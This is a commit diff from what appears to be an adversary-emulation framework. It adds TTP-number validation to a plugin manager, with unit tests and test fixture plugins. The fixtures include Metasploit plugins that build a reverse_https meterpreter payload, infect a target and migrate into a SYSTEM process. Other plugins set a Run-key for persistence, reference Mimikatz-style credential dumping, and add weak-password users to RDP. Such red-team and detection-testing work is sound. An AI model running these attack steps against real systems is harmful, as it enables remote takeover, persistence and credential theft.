Enforcing proper plugin boilerplate

pull/14/head
Thorsten Sick 3 years ago
parent f9616c1d75
commit 17ec685400

@ -3,6 +3,7 @@
from glob import glob from glob import glob
import os import os
import re
import straight.plugin # type: ignore import straight.plugin # type: ignore
from typing import Optional from typing import Optional
@ -117,6 +118,29 @@ class PluginManager():
print(f"Description: {plugin.get_description()}") print(f"Description: {plugin.get_description()}")
print("\t") print("\t")
def is_ttp_wrong(self, ttp):
""" Checks if a ttp is a valid ttp """
if ttp is None:
return True
# Short: T1234
if re.match("^T\\d{4}$", ttp):
return False
# Detailed: T1234.123
if re.match("^T\\d{4}\\.\\d{3}$", ttp):
return False
# Unkown: ???
if "???" == ttp:
return False
# Multiple TTPs in this attack
if "multiple" == ttp:
return False
return True
def check(self, plugin): def check(self, plugin):
""" Checks a plugin for valid implementation """ Checks a plugin for valid implementation
@ -127,6 +151,14 @@ class PluginManager():
# Base functionality for all plugin types # Base functionality for all plugin types
if plugin.name is None:
report = f"No name for plugin: in {plugin.plugin_path}"
issues.append(report)
if plugin.description is None:
report = f"No description in plugin: {plugin.get_name()} in {plugin.plugin_path}"
issues.append(report)
# Sensors # Sensors
if issubclass(type(plugin), SensorPlugin): if issubclass(type(plugin), SensorPlugin):
# essential methods: collect # essential methods: collect
@ -140,6 +172,9 @@ class PluginManager():
if plugin.run.__func__ is AttackPlugin.run: if plugin.run.__func__ is AttackPlugin.run:
report = f"Method 'run' not implemented in {plugin.get_name()} in {plugin.plugin_path}" report = f"Method 'run' not implemented in {plugin.get_name()} in {plugin.plugin_path}"
issues.append(report) issues.append(report)
if self.is_ttp_wrong(plugin.ttp):
report = f"Attack plugins need a valid ttp number (either T1234, T1234.222 or ???) {plugin.get_name()} uses {plugin.ttp} in {plugin.plugin_path}"
issues.append(report)
# Machinery # Machinery
if issubclass(type(plugin), MachineryPlugin): if issubclass(type(plugin), MachineryPlugin):
@ -172,6 +207,9 @@ class PluginManager():
if plugin.stop.__func__ is VulnerabilityPlugin.stop: if plugin.stop.__func__ is VulnerabilityPlugin.stop:
report = f"Method 'stop' not implemented in {plugin.get_name()} in {plugin.plugin_path}" report = f"Method 'stop' not implemented in {plugin.get_name()} in {plugin.plugin_path}"
issues.append(report) issues.append(report)
if self.is_ttp_wrong(plugin.ttp):
report = f"Vulnerability plugins need a valid ttp number (either T1234, T1234.222 or ???) {plugin.get_name()} uses {plugin.ttp} in {plugin.plugin_path}"
issues.append(report)
return issues return issues

@ -0,0 +1,43 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin, Requirement
from app.interface_sfx import CommandlineColors
class CalderaAutostartPlugin1(AttackPlugin):
# Boilerplate
name = "caldera_autostart_1"
description = "Setting a registry key for autostart"
ttp = "T1547.001"
references = ["https://attack.mitre.org/techniques/T1547/001/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.CALDERA]
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
# HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
res = ""
self.attack_logger.vprint(f"{CommandlineColors.OKCYAN}Starting caldera attack to add run key {CommandlineColors.ENDC}", 1)
self.caldera_attack(self.targets[0],
"163b023f43aba758d36f524d146cb8ea",
parameters={"command_to_execute": r"C:\\Windows\\system32\\calc.exe"},
tactics="Persistence",
tactics_id="TA0003",
situation_description="Setting an autorun key runonce")
self.attack_logger.vprint(
f"{CommandlineColors.OKBLUE}Ending caldera attack to add run key {CommandlineColors.ENDC}", 1)
return res

@ -12,7 +12,7 @@ class MetasploitAutostart1Plugin(AttackPlugin):
# Boilerplate # Boilerplate
name = "metasploit_registry_autostart_1" name = "metasploit_registry_autostart_1"
description = "Modify the registry to autostart" description = "Modify the registry to autostart"
ttp = "T1547_1" ttp = "T1547.001"
references = ["https://attack.mitre.org/techniques/T1547/001/"] references = ["https://attack.mitre.org/techniques/T1547/001/"]
tactics = "Persistence" tactics = "Persistence"
tactics_id = "TA0003" tactics_id = "TA0003"
@ -104,7 +104,9 @@ class MetasploitAutostart1Plugin(AttackPlugin):
tactics=self.tactics, tactics=self.tactics,
tactics_id=self.tactics_id, tactics_id=self.tactics_id,
situation_description="", situation_description="",
countermeasure="" countermeasure="",
# sourcefile=self.get_filename(),
# sourceline=self.get_linenumber()
) )
res = self.metasploit.meterpreter_execute_on([command_create], target) res = self.metasploit.meterpreter_execute_on([command_create], target)
print(res) print(res)

@ -11,7 +11,7 @@ class MetasploitGetsystemPlugin(AttackPlugin):
# Boilerplate # Boilerplate
name = "metasploit_getsystem" name = "metasploit_getsystem"
description = "Privilege elevation via metasploit getsystem" description = "Privilege elevation via metasploit getsystem"
ttp = "????" ttp = "???"
references = ["https://docs.rapid7.com/metasploit/meterpreter-getsystem/"] references = ["https://docs.rapid7.com/metasploit/meterpreter-getsystem/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share

@ -11,7 +11,7 @@ class MetasploitKiwiPlugin(AttackPlugin):
# Boilerplate # Boilerplate
name = "metasploit_kiwi" name = "metasploit_kiwi"
description = "Extract credentials from memory. Kiwi is the more modern Mimikatz" description = "Extract credentials from memory. Kiwi is the more modern Mimikatz"
ttp = "t1003" ttp = "T1003"
references = ["https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz"] references = ["https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share

@ -0,0 +1,48 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin, Requirement
import socket
class MetasploitMigratePlugin(AttackPlugin):
# Boilerplate
name = "no TTP"
description = "This one has no ttp"
references = ["https://attack.mitre.org/techniques/T1055/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
self.metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name
)
self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64")
return res

@ -0,0 +1,48 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin, Requirement
import socket
class MetasploitMigratePlugin(AttackPlugin):
# Boilerplate
name = "metasploit_no_description"
ttp = "T1055"
references = ["https://attack.mitre.org/techniques/T1055/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
self.metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name
)
self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64")
return res

@ -0,0 +1,48 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin, Requirement
import socket
class MetasploitMigratePlugin(AttackPlugin):
# Boilerplate
description = "This one has no name"
ttp = "T1055"
references = ["https://attack.mitre.org/techniques/T1055/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
self.metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name
)
self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64")
return res

@ -0,0 +1,68 @@
#!/usr/bin/env python3
# Some users are created (with weak passwords) and sshd is set to allow password-based access
from plugins.base.vulnerability_plugin import VulnerabilityPlugin
class VulnerabilityOk(VulnerabilityPlugin):
# Boilerplate
name = "vulnerability_ok"
description = "Adding users with weak passwords"
references = ["https://attack.mitre.org/techniques/T1110/"]
required_files = [] # Files shipped with the plugin which are needed by the machine. Will be copied to the share
def __init__(self):
super().__init__()
self.plugin_path = __file__
def start(self):
if self.machine_plugin.config.os() == "linux":
# Add vulnerable user
# mkpasswd -m sha-512 # To calc the passwd
# This is in the debian package "whois"
for user in self.conf["linux"]:
cmd = f"sudo useradd -m -p '{user['password']}' -s /bin/bash {user['name']}"
self.run_cmd(cmd)
elif self.machine_plugin.config.os() == "windows":
for user in self.conf["windows"]:
# net user username password /add
cmd = f"net user {user['name']} {user['password']} /add"
self.run_cmd(cmd)
for user in self.conf["windows"]:
# Adding the new users to RDP (just in case we want to test RDP)
cmd = f"""NET LOCALGROUP "Remote Desktop Users" {user['name']} /ADD"""
self.run_cmd(cmd)
else:
raise NotImplementedError
def stop(self):
if self.machine_plugin.config.os() == "linux":
for user in self.conf["linux"]:
# Remove user
cmd = f"sudo userdel -r {user['name']}"
self.run_cmd(cmd)
elif self.machine_plugin.config.os() == "windows":
for user in self.conf["windows"]:
# net user username /delete
cmd = f"net user {user['name']} /delete"
self.run_cmd(cmd)
# Remove the new users to RDP (just in case we want to test RDP)
for user in self.conf["windows"]:
# net user username /delete
cmd = f""""NET LOCALGROUP "Remote Desktop Users" {user['name']} /DELETE"""
self.run_cmd(cmd)
else:
raise NotImplementedError

@ -69,7 +69,7 @@ class TestMachineControl(unittest.TestCase):
p = PluginManager(self.attack_logger, "tests/plugins/sensor/missing_collect/*.py") p = PluginManager(self.attack_logger, "tests/plugins/sensor/missing_collect/*.py")
plugins = p.get_plugins(SensorPlugin) plugins = p.get_plugins(SensorPlugin)
c = p.check(plugins[0]) c = p.check(plugins[0])
self.assertRegexpMatches(c[0], "Method 'collect' not implemented in missing_collect in .*") self.assertRegex(c[0], "Method 'collect' not implemented in missing_collect in .*")
def test_basic_pluginmanager_pick_sensor_plugin_by_name(self): def test_basic_pluginmanager_pick_sensor_plugin_by_name(self):
""" get a plugin by name """ """ get a plugin by name """
@ -143,7 +143,6 @@ class TestMachineControl(unittest.TestCase):
""" a machinery plugin with missing get_ip should throw an error on check""" """ a machinery plugin with missing get_ip should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/machinery/no_ip/*.py") p = PluginManager(self.attack_logger, "tests/plugins/machinery/no_ip/*.py")
plugins = p.get_plugins(MachineryPlugin) plugins = p.get_plugins(MachineryPlugin)
# breakpoint()
c = p.check(plugins[0]) c = p.check(plugins[0])
self.assertEqual(len(c), 1) self.assertEqual(len(c), 1)
self.assertRegex(c[0], "Method 'get_ip' not implemented in machinery_no_ip in .*") self.assertRegex(c[0], "Method 'get_ip' not implemented in machinery_no_ip in .*")
@ -152,7 +151,6 @@ class TestMachineControl(unittest.TestCase):
""" a machinery plugin with missing halt should throw an error on check""" """ a machinery plugin with missing halt should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/machinery/no_halt/*.py") p = PluginManager(self.attack_logger, "tests/plugins/machinery/no_halt/*.py")
plugins = p.get_plugins(MachineryPlugin) plugins = p.get_plugins(MachineryPlugin)
# breakpoint()
c = p.check(plugins[0]) c = p.check(plugins[0])
self.assertEqual(len(c), 1) self.assertEqual(len(c), 1)
self.assertRegex(c[0], "Method 'halt' not implemented in machinery_no_halt in .*") self.assertRegex(c[0], "Method 'halt' not implemented in machinery_no_halt in .*")
@ -161,7 +159,6 @@ class TestMachineControl(unittest.TestCase):
""" a machinery plugin with missing destroy should throw an error on check""" """ a machinery plugin with missing destroy should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/machinery/no_destroy/*.py") p = PluginManager(self.attack_logger, "tests/plugins/machinery/no_destroy/*.py")
plugins = p.get_plugins(MachineryPlugin) plugins = p.get_plugins(MachineryPlugin)
# breakpoint()
c = p.check(plugins[0]) c = p.check(plugins[0])
self.assertEqual(len(c), 1) self.assertEqual(len(c), 1)
self.assertRegex(c[0], "Method 'destroy' not implemented in machinery_no_destroy in .*") self.assertRegex(c[0], "Method 'destroy' not implemented in machinery_no_destroy in .*")
@ -170,7 +167,68 @@ class TestMachineControl(unittest.TestCase):
""" a machinery plugin with missing create should throw an error on check""" """ a machinery plugin with missing create should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/machinery/no_create/*.py") p = PluginManager(self.attack_logger, "tests/plugins/machinery/no_create/*.py")
plugins = p.get_plugins(MachineryPlugin) plugins = p.get_plugins(MachineryPlugin)
# breakpoint()
c = p.check(plugins[0]) c = p.check(plugins[0])
self.assertEqual(len(c), 1) self.assertEqual(len(c), 1)
self.assertRegex(c[0], "Method 'create' not implemented in machinery_no_create in .*") self.assertRegex(c[0], "Method 'create' not implemented in machinery_no_create in .*")
def test_basic_pluginmanager_check_basics_plugin_missing_description(self):
""" a plugin with missing description should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/basics/no_description/*.py")
plugins = p.get_plugins(AttackPlugin)
c = p.check(plugins[0])
self.assertEqual(len(c), 1)
self.assertRegex(c[0], "No description in plugin: metasploit_no_description in .*")
def test_basic_pluginmanager_check_basics_plugin_missing_name(self):
""" a plugin with missing name should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/basics/no_name/*.py")
plugins = p.get_plugins(AttackPlugin)
c = p.check(plugins[0])
self.assertEqual(len(c), 1)
self.assertRegex(c[0], "No name for plugin: in .*")
def test_basic_pluginmanager_check_vul_plugin_missing_ttp(self):
""" a vulnerability plugin with missing name should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/basics/vul_no_ttp/*.py")
plugins = p.get_plugins(VulnerabilityPlugin)
c = p.check(plugins[0])
self.assertEqual(len(c), 1)
self.assertRegex(c[0], "Vulnerability plugins need a valid ttp number \\(either T1234, T1234.222 or ...\\) vulnerability_ok uses None in .*")
def test_basic_pluginmanager_check_ttp_is_none(self):
""" ttp check with NONE"""
p = PluginManager(self.attack_logger, "tests/plugins/basics/vul_no_ttp/*.py")
self.assertEqual(p.is_ttp_wrong(None), True)
def test_basic_pluginmanager_check_ttp_is_short_ttp(self):
""" ttp check with T1234 """
p = PluginManager(self.attack_logger, "tests/plugins/basics/vul_no_ttp/*.py")
self.assertEqual(p.is_ttp_wrong("T1234"), False)
def test_basic_pluginmanager_check_ttp_is_detailed_ttp(self):
""" ttp check with T1234.123 """
p = PluginManager(self.attack_logger, "tests/plugins/basics/vul_no_ttp/*.py")
self.assertEqual(p.is_ttp_wrong("T1234.123"), False)
def test_basic_pluginmanager_check_ttp_is_unknown_ttp(self):
""" ttp check with ??? """
p = PluginManager(self.attack_logger, "tests/plugins/basics/vul_no_ttp/*.py")
self.assertEqual(p.is_ttp_wrong("???"), False)
def test_basic_pluginmanager_check_ttp_is_multiple(self):
""" ttp check with ??? """
p = PluginManager(self.attack_logger, "tests/plugins/basics/vul_no_ttp/*.py")
self.assertEqual(p.is_ttp_wrong("multiple"), False)
def test_basic_pluginmanager_check_ttp_is_wrong_ttp(self):
""" ttp check with something else """
p = PluginManager(self.attack_logger, "tests/plugins/basics/vul_no_ttp/*.py")
self.assertEqual(p.is_ttp_wrong("this is not gonna work"), True)
def test_basic_pluginmanager_check_attack_plugin_missing_ttp(self):
""" a attack plugin with missing name should throw an error on check"""
p = PluginManager(self.attack_logger, "tests/plugins/basics/attack_no_ttp/*.py")
plugins = p.get_plugins(AttackPlugin)
c = p.check(plugins[0])
self.assertEqual(len(c), 1)
self.assertRegex(c[0], "Attack plugins need a valid ttp number \\(either T1234, T1234.222 or ...\\) no TTP uses None in .*")

Loading…
Cancel
Save